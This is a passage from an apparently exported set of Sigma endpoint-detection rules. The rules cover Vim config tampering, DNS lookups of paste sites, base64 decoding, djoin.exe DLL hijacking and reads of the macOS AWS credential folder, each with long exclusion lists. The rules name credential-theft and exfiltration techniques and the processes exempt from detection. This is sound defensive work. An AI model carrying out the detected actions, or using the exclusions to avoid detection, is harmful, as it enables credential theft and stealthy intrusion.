"content": "title: Vim Configuration File Modified\nid: fa5fd8c4-73b1-449f-b1a2-bcc19d728a3a\ndescription: |\n Detects an attempt to modify the .vimrc Vim Configuration File or the ~/.vim/plugins file.\n Attackers can edit the Vim configuration file as a way to silently execute commands when vim is launched. This can be used to establish persistence or to exfiltrate data.\n It is recommended to investigate the .vimrc files via a job for any added suspicious commands and to analyze the process and user session responsible for the file edit to look for malicious actions.\nreferences:\n - https://gtfobins.github.io/gtfobins/vim/\n - https://twitter.com/alh4zr3d/status/1631655900560629760?s=46&t=bmL9gNSzs4gNil-zD7vIRg\n - https://attack.mitre.org/techniques/T1543/\n - https://attack.mitre.org/techniques/T1037/\ndate: 2023/05/03\nmodified: 2025/03/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543\n - attack.t1037\n - classification.Linux.Source.Filesystem\n - classification.Linux.LOLBin.Vim\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.ConfigChange\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path|endswith:\n - '/.vimrc'\n - '/.vim/plugins'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa5fd8c4-73b1-449f-b1a2-bcc19d728a3a",
"rule_name": "Vim Configuration File Modified",
"rule_description": "Detects an attempt to modify the .vimrc Vim Configuration File or the ~/.vim/plugins file.\nAttackers can edit the Vim configuration file as a way to silently execute commands when vim is launched. This can be used to establish persistence or to exfiltrate data.\nIt is recommended to investigate the .vimrc files via a job for any added suspicious commands and to analyze the process and user session responsible for the file edit to look for malicious actions.\n",
"rule_creation_date": "2023-05-03",
"rule_modified_date": "2025-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1037",
"attack.t1543"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa66e677-615c-4f59-ae3f-767498335e97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625427Z",
"creation_date": "2026-03-23T11:45:34.625429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625433Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/pick-six-intercepting-a-fin6-intrusion",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1567/003/"
],
"name": "t1102_002_dns_resolution_text_storage_sites.yml",
"content": "title: DNS Resolution of Text Storage Website\nid: fa66e677-615c-4f59-ae3f-767498335e97\ndescription: |\n Detects a DNS resolution request to a text storage service such as Pastebin.\n Adversaries may use this type of website, which allows for the online storage of text for a set period of time, either as a means of sending commands to and receiving output from a compromised system or exfiltrating data.\n It is recommended to investigate the process at the origin of the DNS resolution to determine whether it is legitimately communicating with this text storage website.\nreferences:\n - https://www.mandiant.com/resources/blog/pick-six-intercepting-a-fin6-intrusion\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1567/003/\ndate: 2023/12/06\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1567.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'pastebin.com'\n - 'paste.ee'\n - 'pastebin.pl'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_opera:\n ProcessImage|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_minionhost:\n ProcessOriginalFileName: 'MinionHost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc'\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n\n exclusion_kaspersky:\n ProcessOriginalFileName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_zsatunnel:\n ProcessOriginalFileName: 'ZSATunnel.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Zscaler, Inc.'\n\n exclusion_freecad:\n ProcessOriginalFileName: 'FreeCAD.exe'\n ProcessDescription: 'FreeCAD main executable'\n\n exclusion_gdlauncher:\n ProcessImage: '?:\\Program Files\\Java\\jre*\\bin\\java.exe'\n ProcessGrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\@gddesktop\\GDLauncher.exe'\n\n exclusion_tabletopesimulator:\n ProcessImage:\n - '?:\\Program Files (x86)\\Steam\\steamapps\\common\\Tabletop Simulator\\Tabletop Simulator.exe'\n - '?:\\Program Files\\Steam\\steamapps\\common\\Tabletop Simulator\\Tabletop Simulator.exe'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa66e677-615c-4f59-ae3f-767498335e97",
"rule_name": "DNS Resolution of Text Storage Website",
"rule_description": "Detects a DNS resolution request to a text storage service such as Pastebin.\nAdversaries may use this type of website, which allows for the online storage of text for a set period of time, either as a means of sending commands to and receiving output from a compromised system or exfiltrating data.\nIt is recommended to investigate the process at the origin of the DNS resolution to determine whether it is legitimately communicating with this text storage website.\n",
"rule_creation_date": "2023-12-06",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002",
"attack.t1567.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fad314a5-5899-4ebb-b205-702c867a309b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.671484Z",
"creation_date": "2026-03-23T11:45:35.294692Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294697Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md",
"https://man7.org/linux/man-pages/man1/base64.1.html",
"https://attack.mitre.org/techniques/T1027/",
"https://attack.mitre.org/techniques/T1140/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1027_decoding_base64_linux.yml",
"content": "title: Base64 Data Decoded (Linux)\nid: fad314a5-5899-4ebb-b205-702c867a309b\ndescription: |\n Detects the usage of the base64 utility to decode base64 encoded data.\n This technique can be used by an attacker to hide a malicious payload and evade security defenses.\n It is recommended to check the decoded blob or file for malicious content and to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md\n - https://man7.org/linux/man-pages/man1/base64.1.html\n - https://attack.mitre.org/techniques/T1027/\n - https://attack.mitre.org/techniques/T1140/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/12/23\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027\n - attack.t1140\n - attack.command_and_control\n - attack.t1132.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Base64\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Obfuscation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/base64'\n CommandLine|contains: ' -d'\n ParentImage|contains: '?'\n\n exclusion_commandline:\n CommandLine: 'base64 --decode'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/bin/terraform|'\n - '|/tmp/.mount_cursor*/usr/share/cursor/cursor|'\n - '|/usr/share/cursor/cursor|'\n - '|/opt/SolarWinds/Agent/bin/Plugins/ADMProbe/SolarWinds.ADM.AgentPlugin|'\n - '|/opt/dynatrace/oneagent/agent/lib64/oneagentos|'\n - '|/usr/local/bin/docker-credential-pass|'\n\n exclusion_cron:\n ParentCommandLine:\n - '*sh /etc/cron.daily/brave'\n - '*sh /etc/cron.daily/google-chrome'\n - '*sh /etc/cron.daily/google-chrome-beta'\n - '*sh /etc/cron.daily/google-chrome-unstable'\n - '*sh /etc/cron.daily/chrome-remote-desktop'\n - '*sh /etc/cron.daily/microsoft-edge'\n - '*sh /etc/cron.daily/opera-browser'\n - '*sh /etc/cron.daily/vivaldi'\n\n exclusion_apt:\n - ParentCommandLine|startswith:\n - '/bin/sh /bin/apt-key '\n - '/bin/sh /usr/bin/apt-key '\n - GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_prodigeadmin:\n ParentCommandLine|startswith:\n - '/bin/bash /prodige/admin/prodigeadmin/.pgih-bootstrap/s_meteo.sh '\n - '/bin/bash /prodige/admin/prodigeadmin/production/.pgih-scripts/pgihadmin'\n\n exclusion_azure_linux_ext:\n ParentCommandLine|startswith: '/bin/sh -c /usr/bin/base64 -d /tmp/tmp* | /usr/bin/openssl smime -inform der -decrypt -recip'\n\n exclusion_centreon:\n - ParentCommandLine|contains: '/usr/lib/centreon/plugins//check_powerscale_quotas.sh'\n - GrandparentCommandLine|contains: '/usr/lib/centreon/plugins//check_powerscale_quotas.sh'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/opt/containerd/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/containerd/bin/containerd-shim-runc-v2|'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fad314a5-5899-4ebb-b205-702c867a309b",
"rule_name": "Base64 Data Decoded (Linux)",
"rule_description": "Detects the usage of the base64 utility to decode base64 encoded data.\nThis technique can be used by an attacker to hide a malicious payload and evade security defenses.\nIt is recommended to check the decoded blob or file for malicious content and to check the behavioral context around the execution of this command to determine whether it is legitimate.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1132.001",
"attack.t1140"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fadda78b-209a-41be-b9a6-9b99cb3c0f61",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082492Z",
"creation_date": "2026-03-23T11:45:34.082494Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082498Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_djoin.yml",
"content": "title: DLL Hijacking via djoin.exe\nid: fadda78b-209a-41be-b9a6-9b99cb3c0f61\ndescription: |\n Detects potential Windows DLL Hijacking via djoin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'djoin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\JOINUTIL.DLL'\n - '\\logoncli.dll'\n - '\\netprovfw.dll'\n - '\\netutils.dll'\n - '\\wdscore.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fadda78b-209a-41be-b9a6-9b99cb3c0f61",
"rule_name": "DLL Hijacking via djoin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via djoin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fae7a83d-e36c-4641-801d-5ce8281bd8a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296555Z",
"creation_date": "2026-03-23T11:45:35.296557Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296562Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_aws_config_read_macos.yml",
"content": "title: Suspicious Read Access to User's AWS Configuration Folder\nid: fae7a83d-e36c-4641-801d-5ce8281bd8a8\ndescription: |\n Detects an attempt to read the contents of the AWS configuration folder.\n Adversaries may access to user's AWS configuration file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2026/02/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/.aws/'\n ProcessImage|contains: '?'\n ProcessParentImage|contains: '?'\n\n filter_aws_cli:\n Image:\n - '/usr/local/aws-cli/aws'\n # launched by aws ssm start-session --target *--profile *\n - '/usr/local/sessionmanagerplugin/bin/session-manager-plugin'\n - '/usr/local/aws-cli/aws_completer'\n - '/Users/*/.asdf/installs/awscli/*/aws'\n - '/opt/homebrew/Cellar/granted/*/bin/granted'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_misc_tools:\n ProcessImage|contains:\n - 'python'\n - 'ruby'\n - 'node'\n - 'terraform'\n - 'starship' # https://github.com/starship/starship\n - '/terragrunt'\n - /usr/bin/awk'\n - '/Users/*/.local/bin/zsh (qterm)'\n - 'steampipe-plugin-aws.plugin'\n - 'nvim'\n - 'awk'\n - 'grep'\n - '/usr/bin/vim'\n\n exclusion_visualcode:\n - Image: '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - ProcessAncestors|contains: 'Visual Studio Code.app/Contents/MacOS/Electron'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_textedit:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n exclusion_md5:\n Image: '/sbin/md5'\n\n exclusion_flintrock:\n Image:\n - '/Users/*/Flintrock-*-standalone-macOS-arm64/flintrock'\n - '/usr/local/bin/flintrock-*-standalone-macos-arm64/flintrock'\n - '/usr/local/bin/flintrock-*-standalone-macOS-x86_64/flintrock'\n\n exclusion_dotnet:\n Image: '/usr/local/share/dotnet/dotnet'\n\n exclusion_sops:\n Image: '/opt/homebrew/Cellar/sops/*/bin/sops'\n\n exclusion_rider:\n ProcessParentImage:\n - '/Applications/Rider.app/Contents/lib/ReSharperHost/macos-arm64/JetBrains.Debugger.Worker'\n - '/Users/*/Applications/Rider.app/Contents/MacOS/rider'\n\n exclusion_orb:\n Image: '/Volumes/Install OrbStack v*/OrbStack.app/Contents/Frameworks/OrbStack Helper.app/Contents/MacOS/OrbStack Helper'\n\n exclusion_sed:\n Image: '/usr/bin/sed'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.sed'\n\n exclusion_claude:\n Image: '/Users/*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude'\n ProcessParentImage: '/Users/*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude'\n ProcessAncestors|contains: '|/Users/*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude'\n\n exclusion_kiro:\n ProcessGrandparentImage: '/Applications/Kiro.app/Contents/Frameworks/Kiro Helper.app/Contents/MacOS/Kiro Helper'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fae7a83d-e36c-4641-801d-5ce8281bd8a8",
"rule_name": "Suspicious Read Access to User's AWS Configuration Folder",
"rule_description": "Detects an attempt to read the contents of the AWS configuration folder.\nAdversaries may access to user's AWS configuration file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reason to do it.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "faed7270-aa37-490a-818a-c476a47af917",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608118Z",
"creation_date": "2026-03-23T11:45:34.608122Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608129Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
